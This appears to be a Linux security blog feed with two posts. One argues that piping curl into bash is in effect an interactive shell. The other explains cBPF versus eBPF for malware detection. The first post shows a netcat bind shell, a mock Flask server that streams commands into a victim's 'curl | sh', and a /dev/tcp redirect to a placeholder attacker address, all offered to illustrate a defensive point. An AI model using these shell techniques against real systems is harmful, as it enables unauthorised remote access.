friday@ortiz.sh:~$
The new original cyber dog. Linux, crypto(graphy), Machine Learning.
Friday Ortiz
Interactivity is the halting problem in a trench coat.
2023-05-05T19:00:00+00:00
https://ortiz.sh/linux/2023/05/05/STOP-INTERACTING
<p>Or: please, <em>please</em>, stop piping <code class="language-plaintext highlighter-rouge">curl</code> into <code class="language-plaintext highlighter-rouge">bash</code> in prod.</p>
<p><strong>TL;DR:</strong> A shell’s built-in understanding (and the conventional understanding)
of its own interactivity is different from what might be considered interactive
from a security perspective. From a defensive security point of view, piping
<code class="language-plaintext highlighter-rouge">curl</code> into <code class="language-plaintext highlighter-rouge">bash</code> is indistinguishable from an interactive shell. Because of
the halting problem (kinda).</p>
<p><strong>‘TL;DR’TL;DR:</strong> My head hurts and I want to go home.</p>
<h2 id="interactive-shells-mean-something-bad-happened-right">Interactive shells mean something bad happened, right?</h2>
<p>Interactive shells in production are generally a bad sign, right? In modern
infrastructure, if you’re using some infrastructure-as-code tool, you’re
probably never shelling into a Linux box unless <a href="https://about.gitlab.com/blog/2017/02/10/postmortem-of-database-outage-of-january-31/">something has gone horribly
wrong</a>.
And you probably want to avoid doing so if it’s at all possible, because of how
error prone it can be to fix production issues this way. <a href="https://devops.stackexchange.com/questions/653/what-is-the-definition-of-cattle-not-pets">Cattle, not
pets</a>,
right? And barring those something-has-gone-terribly-wrong circumstances, an
interactive shell is likely the sign of an attacker… right? So you probably
want to know when an interactive shell is opened on a production system, right?</p>
<p>…right?</p>
<h2 id="what-even-is-an-interactive-shell-nobody-has-ever-explained-it-to-me">What even is an interactive shell? Nobody has ever explained it to me.</h2>
<p>I want you to think about what an interactive shell is before you keep reading.
Write it down if you have to. You’re probably wrong. From a certain point of
view, anyway.</p>
<p>I asked some friends this question and got a mix of answers.</p>
<blockquote>
<p>Question for the class: if I tell you I have two <code class="language-plaintext highlighter-rouge">bash</code> pids, 123 and 456, and
then I tell you “123 is interactive, but 456 is not” what is the difference
between them?</p>
</blockquote>
<p>One answer was “123 was spawned from a TTY and 456 was not.” This might seem
like a good answer, but you can definitely spawn an interactive shell without
a TTY involved.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ docker run --rm ubuntu:22.04 \
bash -c 'echo -n '"'"'echo $- && ls -l /proc/$$/fd'"'"' | bash -i'
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@7aa6f2237867:/# echo $- && ls -l /proc/$$/fd
hiBHs
total 0
lr-x------ 1 root root 64 May 5 15:35 0 -> pipe:[52434]
l-wx------ 1 root root 64 May 5 15:35 1 -> pipe:[50764]
l-wx------ 1 root root 64 May 5 15:35 2 -> pipe:[50765]
l-wx------ 1 root root 64 May 5 15:35 255 -> pipe:[50765]
root@7aa6f2237867:/# exit
</code></pre></div></div>
<p>First we query <code class="language-plaintext highlighter-rouge">bash</code> for the flags it was started with (<code class="language-plaintext highlighter-rouge">$-</code>). We can see the
<code class="language-plaintext highlighter-rouge">i</code> flag is present, and we can see the <code class="language-plaintext highlighter-rouge">$PS1</code> prompt. This <code class="language-plaintext highlighter-rouge">bash</code> process
believes itself to be interactive. It was not spawned from a TTY, and it is not
interacting with a TTY from its own perspective, which we can see when we check
its open file descriptors.</p>
<p>Another answer I got was along the lines of “123 is waiting for user input, and
456 is just executing a script.” That’s a better answer, but it’s still not
quite correct. Here’s a script that will definitely interact with the user, but
believes itself to be operating non-interactively.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ printf '#!/usr/bin/env bash\necho $-\nread -n 1 -p "Press a key!" _\n' > tmp.sh
$ chmod +x tmp.sh
$ bash -c ./tmp.sh
hB
Press a key!
$
</code></pre></div></div>
<p>As you can see, no <code class="language-plaintext highlighter-rouge">i</code> flag is set in the bash process running the script, but
it waits for us to press a key before continuing. You might be thinking, “sure,
the <em>script</em> is interactive, but the <em>shell</em> isn’t.” To which I say,
“semantics.” Pretend I’m an adversary. I am interacting with this shell. It is
interactive. Here’s a stronger (skid-ier?) example.</p>
<h4 id="terminal-1">Terminal 1</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ nc.traditional -lvp 4444 -e /bin/bash 2>/dev/null
</code></pre></div></div>
<h4 id="terminal-2">Terminal 2</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ nc localhost 4444
ls -l /proc/$$/fd
total 0
lrwx------ 1 senicar senicar 64 May 5 15:50 0 -> socket:[55727]
lrwx------ 1 senicar senicar 64 May 5 15:50 1 -> socket:[55727]
l-wx------ 1 senicar senicar 64 May 5 15:50 2 -> /dev/null
echo $-
hBs
</code></pre></div></div>
<p>No <code class="language-plaintext highlighter-rouge">i</code> flag. No TTY. No <code class="language-plaintext highlighter-rouge">$PS1</code>. Fully interactive. If you’ve done any kind of
Linux offensive work, or, like, any CTF, you probably already know this.</p>
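<p>Both listings above were read by eye from <code class="language-plaintext highlighter-rouge">/proc/$$/fd</code>. Here’s a minimal Python sketch of the same check done programmatically. The function name <code class="language-plaintext highlighter-rouge">classify_fd</code> and its return labels are made up for illustration; only the standard library calls are real.</p>

```python
import os
import socket
import stat


def classify_fd(fd: int) -> str:
    """Say what kind of object sits behind a file descriptor.

    The labels ("tty", "pipe", "socket", ...) are our own, chosen to mirror
    what `ls -l /proc/$$/fd` shows in the listings above.
    """
    try:
        if os.isatty(fd):
            return "tty"
        mode = os.fstat(fd).st_mode
    except OSError:
        return "closed"
    if stat.S_ISFIFO(mode):
        return "pipe"
    if stat.S_ISSOCK(mode):
        return "socket"
    return "other"
```

<p>Calling <code class="language-plaintext highlighter-rouge">classify_fd</code> on descriptors 0, 1, and 2 inside either of the shells above would report pipes or sockets and never a TTY, which is exactly why a TTY check tells you nothing about whether someone is on the other end.</p>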
<h2 id="whats-all-this-about-an-i-flag-then">What’s all this about an <code class="language-plaintext highlighter-rouge">i</code> flag, then?</h2>
<p>Let’s <del>shamelessly steal</del> liberally draw inspiration from <a href="https://unix.stackexchange.com/questions/277130/bash-c-and-noninteractive-shell/277153#277153">this stackexchange
post</a>.
The <code class="language-plaintext highlighter-rouge">i</code> flag is set in <code class="language-plaintext highlighter-rouge">bash</code> when <code class="language-plaintext highlighter-rouge">bash</code> considers itself to be interactive.
What defines <code class="language-plaintext highlighter-rouge">bash</code> as being non-interactive? Whatever <code class="language-plaintext highlighter-rouge">bash</code> does when you call
it with <code class="language-plaintext highlighter-rouge">-c</code>. <a href="https://github.com/bminor/bash/blob/ec8113b9861375e4e17b3307372569d429dec814/shell.c#L1860">This function, that’s
it</a>.
Non-interactive means no command history, no job management, no line editing, no
prompt, and errors can’t be ignored. We’ve clearly demonstrated interactivity
without these features, so the internal <code class="language-plaintext highlighter-rouge">bash</code> understanding of interactive
clearly doesn’t match the security-oriented understanding.</p>
<p>There must be other definitions. Let’s check those!</p>
<p>Here’s what <a href="https://web.archive.org/web/20221210223404/https://www.gnu.org/software/libc/manual/html_node/Concepts-of-Job-Control.html">the <code class="language-plaintext highlighter-rouge">glibc</code>
manual</a>
says:</p>
<blockquote>
<p>The fundamental purpose of an interactive shell is to read commands from the
user’s terminal and create processes to execute the programs specified by those
commands.</p>
</blockquote>
<p>In other words, interactive means that the shell’s standard input is a TTY. We
know this isn’t necessary for interactivity. Next.</p>
<p>What about that warning <code class="language-plaintext highlighter-rouge">apt</code> gives you in a script? The one that says “Use with
caution in scripts.” How is <code class="language-plaintext highlighter-rouge">apt</code> detecting interactivity in practice? <a href="https://salsa.debian.org/apt-team/apt/-/blob/9e1398b164f55238990907f63dfdef60588d9b24/apt-private/private-main.cc#L79">Let’s
check the source</a>.</p>
<div class="language-c++ highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="n">isatty</span><span class="p">(</span><span class="n">STDOUT_FILENO</span><span class="p">)</span> <span class="o">&&</span>
<span class="n">_config</span><span class="o">-></span><span class="n">FindB</span><span class="p">(</span><span class="s">"Apt::Cmd::Disable-Script-Warning"</span><span class="p">,</span> <span class="nb">false</span><span class="p">)</span> <span class="o">==</span> <span class="nb">false</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">std</span><span class="o">::</span><span class="n">cerr</span> <span class="o"><<</span> <span class="n">std</span><span class="o">::</span><span class="n">endl</span>
<span class="o"><<</span> <span class="s">"WARNING: "</span> <span class="o"><<</span> <span class="n">flNotDir</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span> <span class="o"><<</span> <span class="s">" "</span>
<span class="o"><<</span> <span class="s">"does not have a stable CLI interface. "</span>
<span class="o"><<</span> <span class="s">"Use with caution in scripts."</span>
<span class="o"><<</span> <span class="n">std</span><span class="o">::</span><span class="n">endl</span>
<span class="o"><<</span> <span class="n">std</span><span class="o">::</span><span class="n">endl</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Oh, it’s checking if standard output is a TTY. We’ve already shown that’s not
required for interactivity. Boo.</p>
<p>What about POSIX? Let’s look at how <a href="https://pubs.opengroup.org/onlinepubs/9699919799/utilities/sh.html">they specify
sh</a>. From
POSIX’s perspective, <code class="language-plaintext highlighter-rouge">sh</code> is interactive if it’s started with <code class="language-plaintext highlighter-rouge">-i</code>, <em>or</em> if it
has no operands and standard input <strong>and</strong> standard error are both attached to a
terminal. This is more constrained than apt, similar to what we see in glibc, and
still not useful from a security perspective.</p>
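<p>To make the comparison concrete, here’s a rough sketch of the three definitions as predicates. The <code class="language-plaintext highlighter-rouge">ShellContext</code> class and its field names are hypothetical, and the POSIX predicate follows the wording of the linked spec (no operands, standard input and standard error attached to a terminal). None of this is code from glibc, apt, or any shell.</p>

```python
from dataclasses import dataclass


@dataclass
class ShellContext:
    """Hypothetical summary of how a shell was started (field names are ours)."""
    has_i_flag: bool = False     # started with -i
    has_operands: bool = False   # e.g. a script path or a -c command string
    stdin_tty: bool = False
    stdout_tty: bool = False
    stderr_tty: bool = False


def glibc_style(ctx: ShellContext) -> bool:
    # "read commands from the user's terminal"
    return ctx.stdin_tty


def apt_style(ctx: ShellContext) -> bool:
    # apt's warning only looks at isatty(STDOUT_FILENO)
    return ctx.stdout_tty


def posix_style(ctx: ShellContext) -> bool:
    # -i, or no operands with stdin and stderr attached to a terminal
    return ctx.has_i_flag or (
        not ctx.has_operands and ctx.stdin_tty and ctx.stderr_tty
    )


# The netcat shell from earlier: no -i, no operands, sockets and /dev/null.
netcat_shell = ShellContext()
# The piped `bash -i` from the first example: -i, but pipes everywhere.
piped_bash_i = ShellContext(has_i_flag=True)
```

<p>All three predicates return false for <code class="language-plaintext highlighter-rouge">netcat_shell</code>, and only the POSIX one fires for <code class="language-plaintext highlighter-rouge">piped_bash_i</code>. An adversary typing into that netcat session would beg to differ.</p>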
<h2 id="please-just-tell-me-what-interactive-means-to-you">Please just tell me what “interactive” means to you.</h2>
<p>My favorite answer to the “what distinguishes pid 123 from pid 456” question
came from Patton Oswalt in Ratatouille.</p>
<blockquote>
<p>Process 123 has a loop that alters its program flow to reach new branches
pending input via file descriptors (e.g., stdin or the network) or process
signals. Process 456 has a loop with a defined set of program flow branches that
will be reached as defined by a preset configuration at the start of the
process.</p>
</blockquote>
<p>I think that’s perfect. An interactive shell (or interactive process in general)
is one that sits and waits for <em>something</em> to happen to it, and that <em>something</em>
determines control flow. A non-interactive program has all of its instructions
known at the time it starts. It doesn’t sit around and wait for more, it just
chugs along doing its thing. For example, <code class="language-plaintext highlighter-rouge">bash -c 'echo "Hello, world!"'</code> is
non-interactive, because we know all the instructions before it starts. It won’t
change, it won’t wait to receive more from <code class="language-plaintext highlighter-rouge">stdin</code>, or a pipe, or a socket. It
echoes out “Hello, world!”, then exits. In contrast, <code class="language-plaintext highlighter-rouge">nc -lvp 4444 | /bin/bash</code>
is interactive, even if we spawn it (like we did above) without the <code class="language-plaintext highlighter-rouge">i</code> flag or
without a TTY being involved. Its control flow is being determined at runtime,
based on whatever information is coming into it from a pipe, which is itself
receiving information from the network. For it to be a shell and not just a
process it should have some loop that performs arbitrary command interpretation,
distinguishing an interactive shell from, say, a web server. Beautiful.</p>
<p>Wait a minute.</p>
<blockquote>
<p>a defined set of program flow branches that will be reached as defined by a
preset configuration at the start of the process</p>
</blockquote>
<p>Ah crap, that’s <a href="https://en.wikipedia.org/wiki/Halting_problem">the halting
problem</a>. Determining that a
shell is non-interactive means determining that it will halt.</p>
<h2 id="what-does-this-have-to-do-with-curl-and-pipes">What does this have to do with <code class="language-plaintext highlighter-rouge">curl</code> and pipes?</h2>
<p>Let’s just… ignore that. For a moment. In practice it’s not that big of a
deal. Most scripts are simple enough that we can actually determine that they’ll
halt. If you slap a <code class="language-plaintext highlighter-rouge">-s -- -y</code> onto the end of the <a href="https://rustup.rs/">rust installer
command</a>, you can manually trace it doing its thing, then
stopping. If you don’t start it with <code class="language-plaintext highlighter-rouge">-y</code>, you can see it starts waiting for
user input (forever, if you ignore it). So if we can easily determine that this
<code class="language-plaintext highlighter-rouge">curl | sh</code> will halt, and is non-interactive, why did I claim that it was
interactive at the start of this post?</p>
<blockquote>
<p>at the start of the process</p>
</blockquote>
<p>When <code class="language-plaintext highlighter-rouge">sh</code> starts here, we don’t have the whole script. When you trace the script
manually to watch it end, you’re doing so after it’s already been downloaded.
When you pipe something into a shell directly from the network you are not
running a script. You are giving an interactive shell to some web server and
asking it to please do its thing thank you.</p>
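<p>If that sounds abstract, here’s a small sketch you can run locally, assuming a POSIX <code class="language-plaintext highlighter-rouge">sh</code> is on your <code class="language-plaintext highlighter-rouge">PATH</code>. The helper name <code class="language-plaintext highlighter-rouge">drive_shell</code> is made up. It stands in for the web server: it feeds <code class="language-plaintext highlighter-rouge">sh</code> one command over a pipe, reads the result, and only then decides what the second command will be.</p>

```python
import subprocess


def drive_shell(first_cmd, choose_next):
    """Feed `sh` one command, read its output, then invent the next command.

    `choose_next` is a callback (our own convention) that receives the first
    command's output and returns the second command as a string.
    """
    proc = subprocess.Popen(
        ["sh"],
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        text=True,
        bufsize=1,
    )
    proc.stdin.write(first_cmd + "\n")
    proc.stdin.flush()
    # sh has already executed the first command, although the rest of the
    # "script" does not exist yet.
    first_out = proc.stdout.readline().rstrip("\n")

    # The remainder of the script is decided mid-run, based on what we saw.
    second_cmd = choose_next(first_out)
    proc.stdin.write(second_cmd + "\n")
    proc.stdin.close()  # EOF ends the shell
    second_out = proc.stdout.read().rstrip("\n")
    proc.wait()
    return first_out, second_out
```

<p>For example, <code class="language-plaintext highlighter-rouge">drive_shell("echo hello", lambda out: f"echo saw-{out}")</code> runs a second command that did not exist when the shell started. From the shell’s side this is just a script arriving on standard input.</p>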
<p>Most of the time this is actually fine. There’s no meaningful difference between
downloading an installer off rustup.rs and giving them a shell. I’m trusting
them to run code on my box either way. But if you’re, say, running a container
in production there is a meaningful security difference between running an
installer with a finite set of instructions and giving a third party service a
shell.</p>
<p>Yes, you can still trust rustup.rs either way. But for your security team, from
a behavioral perspective, running the installer by piping it into <code class="language-plaintext highlighter-rouge">sh</code> instead
of running it off disk looks <em>exactly the same</em> as an adversary popping a shell
on your box with <code class="language-plaintext highlighter-rouge">nc</code>. Your adversaries know this, and they’re laughing at you
whenever you do it.</p>
<p>Back in 2016 someone wrote a blog post about <a href="https://web.archive.org/web/20230101004612/https://www.idontplaydarts.com/2016/04/detecting-curl-pipe-bash-server-side/">detecting the use of <code class="language-plaintext highlighter-rouge">curl | bash</code>
server
side</a>
and selectively feeding an end user malicious code. The server is making a
determination about what’s downloading from it, and feeding different content
based on that determination. The interpreter on the victim side does different
things based on that determination, because it’s not really non-interactive.
It’s sitting in a loop, waiting for the next command to come in. It’s being
interacted with.</p>
<p>We can take this concept and turn it into something human interactive. That is,
we can take <code class="language-plaintext highlighter-rouge">curl | sh</code>, and give ourselves a shell. Here’s some mock Python
code for a Flask app that does just that. The remainder of the code is left as an
exercise to the reader.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">shell_route</span><span class="p">():</span>
    <span class="k">def</span> <span class="nf">generate</span><span class="p">():</span>
        <span class="k">while</span> <span class="bp">True</span><span class="p">:</span>
            <span class="n">cmd</span> <span class="o">=</span> <span class="nb">input</span><span class="p">(</span><span class="s">"$ "</span><span class="p">)</span>
            <span class="k">yield</span> <span class="sa">f</span><span class="s">'</span><span class="si">{</span><span class="n">cmd</span><span class="si">}</span><span class="se">\n</span><span class="s">echo </span><span class="si">{</span><span class="p">(</span><span class="nb">chr</span><span class="p">(</span><span class="mi">33</span><span class="p">)</span> <span class="o">+</span> <span class="s">"1"</span><span class="p">)</span> <span class="o">*</span> <span class="mi">4096</span><span class="si">}</span><span class="s"> >/dev/null</span><span class="se">\n</span><span class="s">'</span>
    <span class="k">return</span> <span class="n">app</span><span class="p">.</span><span class="n">response_class</span><span class="p">(</span><span class="n">stream_with_context</span><span class="p">(</span><span class="n">generate</span><span class="p">()),</span> <span class="n">mimetype</span><span class="o">=</span><span class="s">'text/plain'</span><span class="p">)</span>
</code></pre></div></div>
<p>This will let us send commands. If we want to get replies, we can do something
like set up a listener with netcat and send <code class="language-plaintext highlighter-rouge">exec >/dev/tcp/our_ip/our_port</code> as the
first command. This will redirect output back to us. Bam, shell.</p>
<p>Why would you ever do this? I have no idea. There’s really no point. If someone
is downloading and running your code, there’s no reason to go through the effort
of making it interactive. It’s quite silly. But it does work! In an extremely
reductive and pedantic sense, <code class="language-plaintext highlighter-rouge">curl | sh</code> is an interactive shell. And that
tickles my brain. It also makes your security team’s job harder, so please stop
doing it.</p>
Stop saying eBPF when you mean cBPF.
2023-03-13T20:00:00+00:00
https://ortiz.sh/linux/2023/03/13/CBPF-VS-EBPF
<p><strong>TL;DR:</strong> Let’s detect malware that uses BPF the right way. eBPF has become a hot
topic, which leads to some hype whenever BPF is found in malware. The thing is,
BPF malware is nothing new and most malware is using cBPF, not eBPF. Conflating
cBPF with eBPF is harmful to defenders, who really need to understand the
difference between the two when writing detections.</p>
<p>I’m going to assume you’re at least familiar with eBPF at the marketing blog
level. If not, check out
<a href="https://ortiz.sh/ebpf/2022/01/04/eBPF-FOR-BEGINNINERS.html">some</a>
<a href="https://deepfence.io/aya-your-trusty-ebpf-companion/">of</a>
<a href="https://ortiz.sh/ebpf/2021/11/01/INTRODUCING-OXIDEBPF.html">these</a>
<a href="https://www.youtube.com/watch?v=Y-ROv4LsO0Q">links</a>. Or, if those aren’t
technical enough, <a href="https://tmpout.sh/2/4.html">try</a>
<a href="https://ortiz.sh/bpf/2021/12/02/THE-HIVE.html">these</a>.</p>
<p>Also, code examples will come from kernel 6.2.9. This
means the examples can (do, and probably will) change significantly without
warning on newer and older kernels.</p>
<h1 id="whats-the-problem">What’s the problem?</h1>
<p>As you’ve almost definitely noticed (you did click to read this after all),
interest in eBPF has skyrocketed in the past two or so years. The hype cycle can
make it hard to discern facts from marketing, a critical distinction when trying
to defend against BPF based malware. You’ve probably heard that eBPF is the
successor to something called cBPF, but unless you’ve dug deeper than the blog
post level that’s probably all you know. As we’ll discuss, eBPF and cBPF are
quite different in their operation, capabilities, and defenses.</p>
<p>Let’s pick a few recent examples. BlackBerry’s writeup of Symbiote conflates
cBPF with eBPF, explicitly calling what Symbiote attaches with
<code class="language-plaintext highlighter-rouge">setsockopt</code> “eBPF code.<sup id="fnref:1" role="doc-noteref"><a href="#fn:1" class="footnote" rel="footnote">1</a></sup>” Bytecode handed straight to
<code class="language-plaintext highlighter-rouge">setsockopt</code> is cBPF; an eBPF program has to be loaded with the <code class="language-plaintext highlighter-rouge">bpf()</code> syscall
first, and only the resulting file descriptor can be attached to a socket.
Elastic, in their write up of BPFDoor, does not claim that the
malware uses eBPF, but also does not differentiate the two and does not mention
how the BPF component to the malware is actually loaded. They do link to the
correct cBPF documentation, so it’s a bit better <sup id="fnref:2" role="doc-noteref"><a href="#fn:2" class="footnote" rel="footnote">2</a></sup>. Sysdig’s writeup of
BPFDoor is probably the best: they clearly tell us that eBPF is not involved
right in the title and let defenders know how <code class="language-plaintext highlighter-rouge">setsockopt</code> is involved
<sup id="fnref:3" role="doc-noteref"><a href="#fn:3" class="footnote" rel="footnote">3</a></sup>.</p>
<p>If you look across the internet you’ll find a plethora of users and commentators
mixing up the two technologies <sup id="fnref:4" role="doc-noteref"><a href="#fn:4" class="footnote" rel="footnote">4</a></sup>. Even the official kernel documentation calls
eBPF a “[significant extension]” of cBPF <sup id="fnref:5" role="doc-noteref"><a href="#fn:5" class="footnote" rel="footnote">5</a></sup>, which we’ll see is a bit of a
fudge.</p>
<h1 id="what-do-kprobes-have-to-do-with-packet-filters">What do kprobes have to do with packet filters?</h1>
<p>The first clue that this technology has grown far beyond its original scope is
that you can use what is, ostensibly, a <em>Packet Filter</em> to instrument kernel
functions. How did we get here?</p>
<p>The original BPF paper <sup id="fnref:8" role="doc-noteref"><a href="#fn:8" class="footnote" rel="footnote">6</a></sup> describes a system for inspecting and filtering
packets from userspace where the filtering is performed in-kernel, reducing the
amount of time that needs to be spent copying every packet into userspace and
netting significant performance gains. As an aside, the paper also calls the
system “BSD Packet Filter,” not “Berkeley Packet Filter.” It goes on to
describe an in-kernel “filter machine” which is explicitly not a fully featured
virtual machine that can perform arbitrary filtering. It is specifically focused
on filtering network packets. This technology was adopted in several places in
the kernel, as well as some network device drivers, to filter packets. Then, at
the start of 2012, the onward march of “using packet filters to filter things
that are decidedly not packets” began with SECCOMP filters<sup id="fnref:14" role="doc-noteref"><a href="#fn:14" class="footnote" rel="footnote">7</a></sup>.</p>
<p>Soon after, in 2014, the <code class="language-plaintext highlighter-rouge">bpf()</code> syscall was introduced alongside eBPF <sup id="fnref:9" role="doc-noteref"><a href="#fn:9" class="footnote" rel="footnote">8</a></sup>.
This allowed users to use BPF not just to filter packets, but to filter just
about anything that passes through the kernel (and some stuff that doesn’t!).
The official kernel documentation gives a high level overview of some of the new
features <sup id="fnref:6" role="doc-noteref"><a href="#fn:6" class="footnote" rel="footnote">9</a></sup>: eBPF increased the number of registers available from 2 to 10,
increased the register size to 64 bits, and made calling into helper functions
more efficient. Critically, eBPF also changed the encoding of instructions to
support these new features. This means that eBPF bytecode and cBPF bytecode are
<em>not</em> mutually compatible. Is it “significantly extended?” Sure, I suppose, but
there are a lot of fundamental changes that mean cBPF code won’t “just work”
with the eBPF specification.</p>
<p><a href="https://elixir.bootlin.com/linux/v6.2.9/source/include/uapi/linux/filter.h#L24">Here is a cBPF
instruction</a>:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">sock_filter</span> <span class="p">{</span> <span class="cm">/* Filter block */</span>
<span class="n">__u16</span> <span class="n">code</span><span class="p">;</span> <span class="cm">/* Actual filter code */</span>
<span class="n">__u8</span> <span class="n">jt</span><span class="p">;</span> <span class="cm">/* Jump true */</span>
<span class="n">__u8</span> <span class="n">jf</span><span class="p">;</span> <span class="cm">/* Jump false */</span>
<span class="n">__u32</span> <span class="n">k</span><span class="p">;</span> <span class="cm">/* Generic multiuse field */</span>
<span class="p">};</span>
</code></pre></div></div>
<p><a href="https://elixir.bootlin.com/linux/v6.2.9/source/include/uapi/linux/bpf.h#L71">And here is an eBPF
instruction</a>:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">bpf_insn</span> <span class="p">{</span>
<span class="n">__u8</span> <span class="n">code</span><span class="p">;</span> <span class="cm">/* opcode */</span>
<span class="n">__u8</span> <span class="n">dst_reg</span><span class="o">:</span><span class="mi">4</span><span class="p">;</span> <span class="cm">/* dest register */</span>
<span class="n">__u8</span> <span class="n">src_reg</span><span class="o">:</span><span class="mi">4</span><span class="p">;</span> <span class="cm">/* source register */</span>
<span class="n">__s16</span> <span class="n">off</span><span class="p">;</span> <span class="cm">/* signed offset */</span>
<span class="n">__s32</span> <span class="n">imm</span><span class="p">;</span> <span class="cm">/* signed immediate constant */</span>
<span class="p">};</span>
</code></pre></div></div>
<p>Interestingly, the instructions <em>are</em> the same size. This was done
intentionally, along with other overlapping features, to make translating or
porting cBPF code into eBPF code easier<sup id="fnref:15" role="doc-noteref"><a href="#fn:15" class="footnote" rel="footnote">10</a></sup>. This means that, in theory, you
could shove cBPF bytecode into the <code class="language-plaintext highlighter-rouge">bpf()</code> syscall.</p>
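<p>Same size does not mean same layout, though. Here’s a quick sketch using Python’s <code class="language-plaintext highlighter-rouge">struct</code> module, with format strings transcribed by hand from the two structs above and assuming a little-endian host (where <code class="language-plaintext highlighter-rouge">dst_reg</code> lands in the low nibble). The helper <code class="language-plaintext highlighter-rouge">reinterpret_as_ebpf</code> is made up for illustration.</p>

```python
import struct

# Layouts transcribed from the two structs above; "<" assumes little-endian.
SOCK_FILTER = struct.Struct("<HBBI")  # code:u16, jt:u8, jf:u8, k:u32
BPF_INSN = struct.Struct("<BBhi")     # code:u8, dst_reg:4|src_reg:4, off:s16, imm:s32


def reinterpret_as_ebpf(code, jt, jf, k):
    """Pack a cBPF instruction, then read the same 8 bytes as an eBPF one."""
    raw = SOCK_FILTER.pack(code, jt, jf, k)
    ecode, regs, off, imm = BPF_INSN.unpack(raw)
    return {
        "code": ecode,             # low byte of the cBPF code
        "dst_reg": regs & 0x0F,    # low nibble of the cBPF code's high byte
        "src_reg": regs >> 4,      # high nibble of the cBPF code's high byte
        "off": off,                # jt and jf squashed into one signed short
        "imm": imm,                # the cBPF k field, now signed
    }
```

<p>Feed it a cBPF conditional jump such as <code class="language-plaintext highlighter-rouge">reinterpret_as_ebpf(0x15, 1, 2, 0x800)</code> and the two one-byte jump targets come back as a single <code class="language-plaintext highlighter-rouge">off</code> of 513. The bytes fit, but they no longer mean what the cBPF author intended.</p>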
<p>To prove a point, let’s see what happens when we do exactly that. We’ll use
<code class="language-plaintext highlighter-rouge">tcpdump</code>’s ability to output cBPF bytecode to create a dead simple cBPF filter.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># tcpdump -i lo -dd
{ 0x6, 0, 0, 0x00040000 },
</code></pre></div></div>
<p>This gives us a code of <code class="language-plaintext highlighter-rouge">0x06</code>, empty <code class="language-plaintext highlighter-rouge">jt</code> and <code class="language-plaintext highlighter-rouge">jf</code>, and a multiuse value of
<code class="language-plaintext highlighter-rouge">0x00040000</code>. The code of <code class="language-plaintext highlighter-rouge">0x06</code> corresponds to
<a href="https://elixir.bootlin.com/linux/v6.2.9/source/include/uapi/linux/bpf_common.h#L13"><code class="language-plaintext highlighter-rouge">BPF_RET</code></a>,
which indicates that this is a return instruction. The <code class="language-plaintext highlighter-rouge">0x00040000</code> value
corresponds to the size of the packet (snapshot length) we want to capture. By
default, it’s 256 kibibytes. This simple filter immediately returns and says
“grab the whole packet.”</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include <linux/bpf.h>
#include <linux/filter.h>
#include <sys/syscall.h>
#include <stdio.h>
#include <unistd.h>
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span>
<span class="k">struct</span> <span class="n">sock_filter</span> <span class="n">filter</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span>
<span class="p">{</span> <span class="mh">0x6</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mh">0x00040000</span> <span class="p">},</span>
<span class="p">};</span>
<span class="kt">char</span> <span class="o">*</span> <span class="n">license</span> <span class="o">=</span> <span class="s">"GPL"</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">bpf_insn</span><span class="o">*</span> <span class="n">insn</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">bpf_insn</span><span class="o">*</span><span class="p">)</span> <span class="o">&</span><span class="n">filter</span><span class="p">;</span>
<span class="k">union</span> <span class="n">bpf_attr</span> <span class="n">attr</span> <span class="o">=</span> <span class="p">{</span>
<span class="p">.</span><span class="n">prog_type</span> <span class="o">=</span> <span class="n">BPF_PROG_TYPE_SOCKET_FILTER</span><span class="p">,</span>
<span class="p">.</span><span class="n">insn_cnt</span> <span class="o">=</span> <span class="mi">1</span><span class="p">,</span>
<span class="p">.</span><span class="n">insns</span> <span class="o">=</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span> <span class="kt">long</span><span class="p">)</span> <span class="n">insn</span><span class="p">,</span>
<span class="p">.</span><span class="n">license</span> <span class="o">=</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span> <span class="kt">long</span><span class="p">)</span> <span class="n">license</span><span class="p">,</span>
<span class="c1">// omitted for space</span>
<span class="p">};</span>
<span class="kt">int</span> <span class="n">ret</span> <span class="o">=</span> <span class="n">syscall</span><span class="p">(</span><span class="n">SYS_bpf</span><span class="p">,</span> <span class="n">BPF_PROG_LOAD</span><span class="p">,</span> <span class="o">&</span><span class="n">attr</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">attr</span><span class="p">));</span>
<span class="k">if</span> <span class="p">(</span><span class="n">ret</span> <span class="o"><</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
<span class="n">perror</span><span class="p">(</span><span class="s">"bpf"</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>If we run it we immediately get an <code class="language-plaintext highlighter-rouge">EINVAL</code>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># cc bpf.c
# ./a.out
bpf: Invalid argument
</code></pre></div></div>
